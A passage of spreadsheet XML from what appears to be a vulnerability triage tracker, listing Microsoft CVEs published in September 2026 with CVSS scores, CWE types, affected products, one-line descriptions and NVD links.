      <c r="R794" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68787</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K795" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr"/>
      <c r="Q795" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R795" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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96" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr"/>
      <c r="Q796" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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97" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr"/>
      <c r="Q797" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68844</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr"/>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr"/>
      <c r="Q798" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68845</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr"/>
      <c r="Q799" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68848</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr"/>
      <c r="L800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr"/>
      <c r="Q800" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68850</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr"/>
      <c r="L801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr"/>
      <c r="Q801" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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2" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr"/>
      <c r="Q802" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68877</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr"/>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr"/>
      <c r="Q803" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68885</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr"/>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr"/>
      <c r="Q804" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68888</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F805" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr"/>
      <c r="L805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr"/>
      <c r="Q805" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68890</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F806" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr"/>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr"/>
      <c r="Q806" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68892</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr"/>
      <c r="Q807" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68896</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr"/>
      <c r="Q808" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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09" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr"/>
      <c r="Q809" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69269</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr"/>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr"/>
      <c r="Q810" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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11" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr"/>
      <c r="Q811" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69277</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr"/>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr"/>
      <c r="Q812" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69283</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
